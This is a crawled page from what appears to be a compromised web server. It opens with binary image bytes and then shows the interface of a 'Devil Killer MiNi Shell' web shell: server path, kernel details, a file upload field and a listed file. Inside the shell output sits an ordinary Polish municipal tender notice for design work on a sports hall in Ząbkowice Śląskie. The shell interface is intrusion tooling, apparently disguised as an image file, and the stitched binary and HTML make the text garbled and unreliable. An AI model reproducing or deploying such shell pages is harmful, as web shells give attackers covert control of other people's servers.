JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210903/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210903/0016917901-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Wykonanie dokumentacji projektowej modernizacji hali sportowej „Słoneczna” <br/>w Ząbkowicach Śląskich” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Ząbkowice Śląskie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 890718461</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. 1 Maja 15</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Ząbkowice Śląskie</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">57-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL517 - Wałbrzyski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne@zabkowiceslaskie.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://bip.zabkowiceslaskie.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Wykonanie dokumentacji projektowej modernizacji hali sportowej „Słoneczna” <br/>w Ząbkowicach Śląskich” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b9adbee9-0c93-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00169179</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-09-03</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000862/09/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.6 Wykonanie dokumentacji projektowej modernizacji hali sportowej "Słoneczna" w Ząbkowicach Śląskich</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zabkowiceslaskie.logintrade.net/rejestracja/ustawowe.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zabkowiceslaskie.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W<br/>postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa<br/>się WYŁĄCZNIE przy użyciu środków komunikacji elektronicznej, w tym w szczególności Platformy<br/>Przetargowej:<br/>https://zabkowiceslaskie.logintrade.net/rejestracja/ustawowe.html<br/>Wszelkie oświadczenia, dokumenty, w tym również OFERTA sporządzane są przez Wykonawcę pod<br/>rygorem nieważności, w postaci lub formie elektronicznej i opatrywane:<br/>- kwalifikowanym podpisem elektronicznym,<br/>- LUB podpisem zaufanym,<br/>- LUB podpisem osobistym.<br/>Środkiem komunikacji elektronicznej, służącym złożeniu oświadczenia/-ń, dokumentu/-ów, OFERTY<br/>przez Wykonawcę, jest jego prawidłowe złożenie w ZAKŁADCE DANEGO POSTĘPOWANIA na<br/>Platformie dostępnej pod adresem:<br/>https://zabkowiceslaskie.logintrade.net/rejestracja/ustawowe.html<br/>Korzystanie z Platformy Przetargowej przez Wykonawcę jest bezpłatne.<br/>Do połączenia z Platformą używany jest szyfrowany protokół HTTPS. Szyfrowanie danych odbywa się<br/>przy pomocy protokołu SSL. Certyfikat SSL zapewnia poufność transmisji danych przesyłanych przez<br/>Internet. Wykonawca posiadający konto na w/w Platformie Przetargowej: ma dostęp do możliwości<br/>złożenia, zmiany, wycofania oferty, a także funkcjonalności pozwalających na zadawanie pytań do<br/>treści SWZ oraz komunikację z Zamawiającym w pozostałych obszarach.<br/>Wymagania techniczne, organizacyjne wysyłania i odbierania korespondencji elektronicznej, w tym<br/>dokumentów i oświadczeń elektronicznych, elektronicznych kopii dokumentów i oświadczeń (tj.<br/>cyfrowego odwzorowania dokumentów, oświadczeń w postaci papierowej opatrzone podpisem<br/>elektronicznym) oraz informacji przekazywanych przy użyciu Platformy Przetargowej dostępne są na<br/>stronie: https://zabkowiceslaskie.logintrade.net/rejestracja/instrukcje.html<br/>Niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na Platformie są następujące: a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2<br/>GHZ lub jego nowsza wersja, jeden z systemów operacyjnych – MS Windows 7, Mac Os x 10 4, Linux,<br/>lub ich nowsze wersje,<br/>c) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja<br/>10 0.,<br/>d) włączona obsługa JavaScript,<br/>e) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików.pdf,<br/>f) szyfrowanie na Platformie odbywa się za pomocą protokołu TLS 1.3.<br/>g) oznaczenie czasu odbioru danych przez platformę stanowi datę oraz dokładny czas generowany wg.<br/>czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>Wykonawca zobowiązany jest zapoznać się Regulaminem korzystania z Platformy dostępnym na:<br/>https://zabkowiceslaskie.logintrade.net/rejestracja/regulamin.html</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://zabkowiceslaskie.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Zamawiający dopuszcza złożenie oferty w postaci katalogu</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający - względem osób fizycznych, od których dane<br/>osobowe bezpośrednio pozyskał jest administratorem danych. Dotyczy to w szczególności:<br/>- Wykonawcy będącego osobą fizyczną,<br/>- Wykonawcy będącego osobą fizyczną, prowadzącą jednoosobową działalność gospodarczą,<br/>- pełnomocnika Wykonawcy będącego osobą fizyczną (np. dane osobowe zamieszczone w<br/>pełnomocnictwie),<br/>- członka organu zarządzającego wykonawcy, będącego osobą fizyczną (np. dane osobowe<br/>zamieszczone w informacji z KRK),<br/>- osoby fizycznej skierowanej do przygotowania i przeprowadzenia postępowania o udzielenie<br/>zamówienia publicznego;<br/>Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27<br/>kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i<br/>w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne<br/>rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016 r., str. 1), dalej „RODO”,<br/>Zamawiający informuje, że:<br/>1) administratorem Pani/Pana danych osobowych jest Gmina Ząbkowice Śląskie<br/>z siedzibą Urząd Miejski w Ząbkowicach Śląskich ul. 1 Maja 15, 57-200 Ząbkowice Śląskie.<br/>2) administrator wyznaczył Inspektora Ochrony Danych Osobowych, z którym można kontaktować się<br/>pod adresem e-mail: iod@zabkowiceslaskie.pl<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO<br/>w celu związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego;<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 18, 19 oraz 74 ustawy Pzp.;<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4<br/>lat od dnia zakończenia postępowania o udzielenie zamówienia,<br/>a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania<br/>umowy;<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane<br/>w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>8) posiada Pani/Pan:<br/>• na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>• na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych1;<br/>• na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO2;<br/>• prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że<br/>przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO.<br/>Szczegółowo RODO kwestie reguluje SWZ dostępna na stronie internetowej niniejszego<br/>postępowania.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie przysługuje Pani/Panu:<br/>• w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>• prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>• na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.”<br/>Szczegółowo RODO kwestie reguluje SWZ dostępna na stronie internetowej niniejszego<br/>postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.18.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Nazwa nadana zamówieniu: <br/><br/>„Wykonanie dokumentacji projektowej modernizacji hali sportowej „Słoneczna” <br/>w Ząbkowicach Śląskich”<br/><br/>2.	Wspólny Słownik Zamówień (CPV): <br/><br/>Kody CPV: <br/><br/>71220000-6 Usługi projektowania architektonicznego<br/>71320000-7 Usługi inżynieryjne w zakresie projektowania<br/><br/>ZAMAWIAJĄCY NIE DOPUSZCZA SKŁADANIA OFERT CZĘŚCIOWYCH.<br/>ZAMAWIAJĄCY NIE DOPUSZCZA SKŁADANIA OFERT WARIANTOWYCH.<br/><br/>3.	Przedmiot zamówienia: <br/><br/>Przedmiotem niniejszego zamówienia jest wykonanie usługi polegającej na opracowaniu kompletnej dokumentacji projektowej oraz dokumentacji kosztorysowej i przetargowej dla zadania pn.: „Wykonanie dokumentacji projektowej modernizacji hali sportowej „Słoneczna” w Ząbkowicach Śląskich”.<br/><br/>Lokalizacja inwestycji:<br/>Adres inwestycji ul. Powstańców Warszawy 8i, 57-200 Ząbkowice Śląskie, powiat ząbkowicki, województwo dolnośląskie. Działki nr 2/174, 2/152 AM-7, Obręb Osiedle Wschód.<br/>Stan istniejący:<br/><br/>Obiekt hala sportowa „Słoneczna” w Ząbkowicach Śląskich wymaga modernizacji i rozbudowy. Przestarzałe technologicznie oświetlenie obiektu w tym głównej sali sportowej wymaga wymiany. Termomodernizacja budynku jest niezbędna. Obecny stan techniczny obiektu wiąże się z dużymi kosztami utrzymania jak i brakiem jego funkcjonalności. Modernizacja obiektu sportowego w tym zmiana funkcjonalności pomieszczeń oraz jego rozbudowa w związku z oczekiwaniami korzystających z kompleksu sportowego jest niezbędna. Modernizacja sanitariatów i łazienek oraz ciągów komunikacyjnych w tym likwidacja barier architektonicznych jest konieczna. <br/>Zakres przewidzianych robót:<br/>Na podstawie opracowanej i uzgodnionej z Zamawiającym koncepcji projektowej Projektant wykona: <br/>1).Projekt budowlany i wykonawczy. <br/>2).Dokumentację kosztorysową i przetargową oraz uzyska wszelkie zgody, uzgodnienia <br/>i pozwolenia administracyjne, umożliwiające rozpoczęcie realizacji inwestycji w zakresie modernizacji i rozbudowy hali sportowej „Słoneczna” w Ząbkowicach Śląskich, w tym: <br/>a) dokona inwentaryzacji obiektu na potrzeby opracowania dokumentacji projektowej,<br/>b) dokona inwentaryzacji istniejącej instalacji elektrycznej, w tym instalacji oświetleniowej, <br/>c) dokona inwentaryzacji istniejącej sieci wodociągowej i kanalizacyjnej, <br/>d) dokona inwentaryzacji istniejących drzew – przygotuje kompletną dokumentację zezwalającą na usuniecie drzew, Projektant w uzgodnieniu z Zamawiającym przygotuje projekt zagospodarowania zieleni w obrębie obiektu (uwzględniający nasadzenia drzew),<br/>e) w przypadku takiej konieczności wystąpi o zmianę warunków przyłączenia do sieci elektrycznej i wodociągowej oraz kanalizacyjnej,<br/>f) wyłączy zbędną sieć elektryczną, kanalizacyjną i wodociągową z obiegu, <br/>g) zaprojektuje przyłącze internetowe światłowodowe do obiektu z jego rozprowadzeniem zapewniające publiczny dostęp do sieci internetowej na terenie całego kompleksu sportowego. <br/>3).Wykona audyt energetyczny obiektu. Na podstawie opracowanej dokumentacji zaprojektuje termomodernizację obiektu.<br/>4).Zaprojektuje wymianę pokrycia dachowego obiektu wraz z dociepleniem, nową instalacją odgromową, wzmocnieniem konstrukcji więźby dachowej (w przypadku takiej konieczności) na potrzeby instalacji fotowoltaicznej.<br/>5).Zaprojektuje adaptację ze zmianą funkcjonalności pomieszczeń obiektu uwzględniając: adaptację pomieszczeń zlokalizowanych na parterze obiektu na 3 pokoje gościnne (dotychczasowe pomieszczenie sauny, pomieszczenie socjalne, pomieszczenie salki konferencyjnej oraz pomieszczenie siłowni). Dokona adaptacji dotychczasowego pomieszczenia salki fitness na siłownię. <br/>6).W zakresie rozbudowy obiektu zaprojektuje dwa pomieszczenia o wymiarach powierzchni użytkowej 15 metrów długości i 15 merów szerokości z przeznaczeniem na salę fitness <br/>z ciągiem komunikacyjnym i szatniami oraz sanitariatami wraz z kompletnym systemem ogrzewania i klimatyzacji (wentylacją) oraz oświetleniem i wyposażeniem.<br/>7).Dokona inwentaryzacji centralnego ogrzewania w obiekcie. Zaprojektuje nadmuchowy system ogrzewania współpracujący z centralą wentylacyjno-klimatyzacyjną umożliwiającą odpowiednią obróbkę powietrza (w tym chłodzenie głównej sali sportowej). W pozostałych pomieszczeniach zaprojektuje modernizację instalacji centralnego ogrzewania.<br/>8).Zakres dokumentacji projektowej uwzględni modernizację nawierzchni płyty głównej sali sportowej. <br/>9).Dokona inwentaryzacji oświetlenia głównej sali sportowej. Zaprojektuje oświetlenie głównej sali sportowej.<br/>10).Dokona inwentaryzacji oświetlenia pozostałych pomieszczeń obiektu. Zaprojektuje modernizację oświetlenia pozostałych pomieszczeń na obiekcie. <br/>11).Dokona inwentaryzacji systemu wentylacji na obiekcie. Zaprojektuje modernizację systemu wentylacji z rozdziałem na pomieszczenia lokalu gastronomicznego i pozostałe lokale użytkowe. <br/>12).Zaprojektuje monitoring obiektu (wewnętrzny i zewnętrzny) wraz z instalacją alarmową<br/>i kontrolą dostępu do obiektu. <br/>13).Zaprojektuje wymianę stolarki drzwiowej i okiennej.<br/>14).Zaprojektuje modernizację toalet i łazienek.<br/>15).Wyodrębni i utworzy pomieszczenia socjalne dla personelu wraz z sanitariatem i szatnią.<br/>16).Zaprojektuje likwidację korytarza adaptując powierzchnię na szatnię.<br/>17).Dokona inwentaryzacji instalacji wodnokanalizacyjnej i zaprojektuje jej modernizację.<br/>18).Zaprojektuje modernizację oświetlenia zewnętrznego.<br/>19).Zaprojektuje modernizację korytarzy i schodów (likwidacja barier architektonicznych).<br/>20).Zaprojektuje modernizację wejścia głównego.<br/>21).Zaprojektuje modernizację spikerki.<br/>22).Wyodrębni i zaprojektuje pokój dla sędziów wraz z sanitariatem i łazienką.<br/>23).Zaprojektuje system nagłośnieniowy.<br/>24).Zaprojektuje montaż instalacji fotowoltaicznej do produkcji własnej energii elektrycznej na potrzeby własne budynku oraz instalację solarną do podgrzewania wody użytkowej.<br/>25).W dokumentacji projektowej uwzględni adaptację obiektu do obowiązujących wymagań sanitarnych i bezpieczeństwa pożarowego budynków (organizacja imprez masowych).<br/>26).Uwzględni dodatkowe uwagi Zamawiającego w zakresie zmiany funkcjonalności pomieszczeń i adaptacji obiektu.<br/>27).Wykonawca po wykonaniu kompletnej dokumentacji technicznej przed złożeniem projektu budowlanego do Starostwa Powiatowego celem uzyskania pozwolenia na budowę musi otrzymać akceptację przedłożonej dokumentacji przez Zamawiającego. W przypadku braku akceptacji ze strony Zamawiającego Wykonawca w terminie do 14 dni wykona zalecenia Zamawiającego i przedłoży ponownie uzupełnioną dokumentację uwzględniającą wniesione uwagi Zamawiającego. <br/>28).Po akceptacji kompletnej dokumentacji technicznej Wykonawca dokona zgłoszenia zamiaru przystąpienia do wykonania robót budowlanych we właściwym organie administracji architektoniczno-budowlanej - uzyska pozwolenie na budowę. <br/>29).Wykonawca w terminie nie później niż do dwudziestu czterech tygodni od dnia podpisania umowy złoży wniosek zgłoszenia wykonania robót budowlanych lub wniosek o pozwolenie na budowę w Starostwie Powiatowym i przekaże wraz z oświadczeniem o kompletności dokumentacji Zamawiającemu.<br/>30).Opracowanie kosztorysu inwestorskiego. Odrębne kosztorysy dla zadań od 4) do 25). <br/>31).Opracowanie wzoru kosztorysu ofertowego. Odrębne wzory kosztorysów ofertowych dla zadań od 4) do 25). <br/>32).Opracowanie przedmiaru robót, przez które należy rozumieć opracowanie zawierające opis robót budowlanych w kolejności technologicznej ich wykonania, z podaniem ilości jednostek przedmiarowych robót, wynikających z dokumentacji projektowej oraz podstaw do ustalenia cen jednostkowych lub nakładów rzeczowych. Odrębnie dla zadań od 4) <br/>do 25).<br/>33).Opracowanie specyfikacji technicznej wykonania i odbioru robót budowlanych <br/>dla wszystkich branż.<br/>34).Przekazania zamawiającemu w jego siedzibie 5 egzemplarzy projektu budowlanego <br/>i 5 egzemplarzy projektu wykonawczego posiadającego kompletne pozwolenie na prowadzenie prac, protokołem zdawczo - odbiorczym wraz z oświadczeniem: <br/>o kompletności dokumentacji, że przekazana dokumentacja jest opracowana w zakresie niezbędnym do realizacji celu, któremu ma służyć, o zgodności dokumentacji z umową, obowiązującymi przepisami, zasadami wiedzy technicznej i normami, ponumerowania wszystkich stron dokumentacji począwszy od strony tytułowej.<br/>35).Projekt budowlany i wykonawczy należy wykonać odrębnie dla zadań:<br/>a). 4), <br/>b). 5), 14), 15), 16), 19), 20), 21), 22), 25),<br/>c). 6),<br/>d). 7), 17), 24),<br/>e). 8), <br/>f). 9), 10), 12), 18), 23), <br/>g). 11),<br/>h). 13).<br/>36).Zamawiający zastrzega możliwość dokonania na każdym etapie trwania umowy zmian koncepcji, rezygnacji z istniejących zapisów bądź wprowadzenia nowych elementów dla zadania inwestycyjnego.<br/><br/>Szczegóły związane z przedmiotem zamówienia zawarte są w załączniku nr 8 do SWZ tj. projektowanych postanowieniach umowy w sprawie zamówienia publicznego, które zostaną wprowadzone do treści tej umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71220000-6 - Usługi projektowania architektonicznego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">168 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zmawiający przewiduje możliwość zastawania art. 304 ustawy Pzp. tj. udzielenia<br/>zamówienia w trybie z wolnej ręki przy spełnieniu warunków, o których mowa w art. 214 ust. 1 pkt 7<br/>ustawy Pzp. Zamówienie może zostać udzielone w okresie 3 lat od dnia udzielenia zamówienia<br/>podstawowego, dotychczasowemu Wykonawcy usług. Zamówienie polegać będzie na powtórzeniu<br/>podobnych usług oraz będzie zgodne przedmiotem zamówienia podstawowego. Opis przedmiotu<br/>niniejszego zamówienia oraz projektowane 